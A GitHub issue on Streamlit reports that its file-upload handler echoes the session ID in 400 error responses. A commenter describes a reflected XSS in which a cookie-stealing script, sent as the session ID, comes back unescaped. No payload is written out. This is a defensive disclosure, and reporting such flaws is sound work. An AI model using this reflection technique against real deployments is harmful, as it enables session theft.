Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

When "upload_file_request_handler.py" returns 400 error, we can see session ID. #2803

Closed
450ryousuke opened this issue Feb 17, 2021 · 3 comments · Fixed by #7267
Closed

When "upload_file_request_handler.py" returns 400 error, we can see session ID. #2803

450ryousuke opened this issue Feb 17, 2021 · 3 comments · Fixed by #7267
Labels
area:deployment Related to deploying Streamlit apps feature:st.file_uploader priority:P2 type:bug Something isn't working

Comments

@450ryousuke
Copy link

Summary

We make application on Microsoft Azure App Service with streamlit.
When we conducted a test of uploading file with st.file_uploader, it returned 400 error and session ID as string.
We checked your codes and noticed that we have 400 error, streamlit/lib/streamlit/server/upload_file_request_handler.py returns error code 400, reason and session ID on line 126-128.
This problem may lead to security incidents like XSS.
Please check it.

Steps to reproduce

Code snippet:

import streamlit as st

uploaded_file = st.file_uploader("uploading Excel files", type="xlsx", key="xlsx_up")
if uploaded_file is not None:
     st.write("Success")

How the error occurred cannot be provided due to confidentiality,

Expected behavior:

When we have 400 error, streamlit will return only error code and error reason without session ID.

Actual behavior:

When we have 400 error, streamlit returns error code and error reason with session ID
Screenshots cannot be uploaded due to confidentiality.

Is this a regression?

That is, did this use to work the way you expected in the past?
yes / no
⇒no

Debug info

  • Streamlit version: (get it with $ streamlit version)
    ⇒0.74.1
  • Python version: (get it with $ python --version)
    ⇒3.7
  • Using Conda? PipEnv? PyEnv? Pex?
    ⇒Pip
  • OS version:
    ⇒Linux
  • Browser version:
    ⇒Chrome 88.0.4324.150
@450ryousuke 450ryousuke added type:bug Something isn't working status:needs-triage Has not been triaged by the Streamlit team labels Feb 17, 2021
@karriebear
Copy link
Contributor

Thanks for raising this!

In the ideal world we should only be returning that error if a session ID is invalid in which case it should not matter what the session_id is since it should not be usable for any connection with the server. We should definitely pull out the widget_id out of the check and separate that so that we are not potentially exposing a valid session_id. Once that is done, I think it should be fine showing an invalid session_id but would love to get your thoughts!

@450ryousuke
Copy link
Author

Thank you for your comment.
We can understand what you think about this issue.

We got a capture that shows the problem.
We send POST message to our uploading functions using streamlit on Azure App service with invalid session ID and an script to get Cookie.
Application returned original invalid session ID and script without escaped method.
This script will be used to attack application or get information in the system.
I think streamlit should escape invalid scripts for avoid attack from someone.

Thank you for your consideration.

POST_image

@nthmost nthmost removed the status:needs-triage Has not been triaged by the Streamlit team label Feb 19, 2021
@cthurston
Copy link

cthurston commented Oct 20, 2021

Deployed a docker container to a Kubernetes cluster and I'm hitting this error as well. It seems to work every other time. Any workarounds?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
area:deployment Related to deploying Streamlit apps feature:st.file_uploader priority:P2 type:bug Something isn't working
Projects
None yet
Development

Successfully merging a pull request may close this issue.

6 participants